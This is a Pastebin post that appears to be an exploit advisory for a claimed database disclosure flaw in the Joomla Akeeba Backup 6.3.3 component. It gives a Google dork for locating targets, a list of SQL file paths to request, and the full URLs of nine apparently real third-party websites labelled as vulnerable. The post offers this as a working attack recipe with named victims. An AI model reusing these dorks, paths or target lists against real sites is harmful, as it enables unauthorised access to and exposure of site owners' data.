Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################################
- # Exploit Title : Joomla Akeeba Backup Components 6.3.3 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 19/01/2019
- # Vendor Homepage : akeebabackup.com
- # Software Information Link : extensions.joomla.org/extension/akeeba-backup/
- # Software Download Link : akeebabackup.com/download/akeeba-backup/6-3-3/pkg_akeeba-6-3-3-core-zip.zip
- # Software Affected Version : 6.3.3
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/administrator/components/com_akeeba/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- ###################################################################################
- # Description :
- **************
- Akeeba Backup Core is the most widely used open-source backup component for the Joomla! CMS.
- Its mission is simple: create a site backup that can be restored on any Joomla!-capable server,
- making it ideal not only for backups but also for site transfers or even deploying sites to your
- clients' servers. Akeeba Backup creates a full backup of your site in a single archive.
- The archive contains all the files, a database snapshot and an installer similar in function
- to the standard Joomla! installer. The backup and restore process is AJAX powered
- to avoid server timeouts, even with huge sites. Alternatively, you can make a backup of
- only your database, or only your files. Akeeba Backup is the reliable, easy to use,
- open source backup solution for your Joomla! site.
- ###################################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_akeeba/sql/common/mysql.xml
- /administrator/components/com_akeeba/sql/common/postgresql.xml
- /administrator/components/com_akeeba/sql/common/sqlsrv.xml
- /administrator/components/com_akeeba/sql/install/mysql/install.sql
- /administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
- /administrator/components/com_akeeba/sql/install/sqlazure/install.sql
- /administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- /administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
- /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
- /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
- /administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
- /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
- /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
- /administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
- /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
- /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
- /administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql
- ###################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] pentictonwebdesign.com/sites/stop/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- [+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
- [+] bainhotte.com/a%20sup/administrator/components/com_akeeba/sql/install/mysql/install.sql
- [+] alsys.ma/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
- [+] farwestpizza.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- [+] leschaumieresdekerguan.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- [+] desertlearningcenter.org/joomla/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- [+] staszickutno.pl/staszickutno.pl/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- [+] prehisto.ch/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
- ###################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################################
Add Comment
Please, Sign In to add comment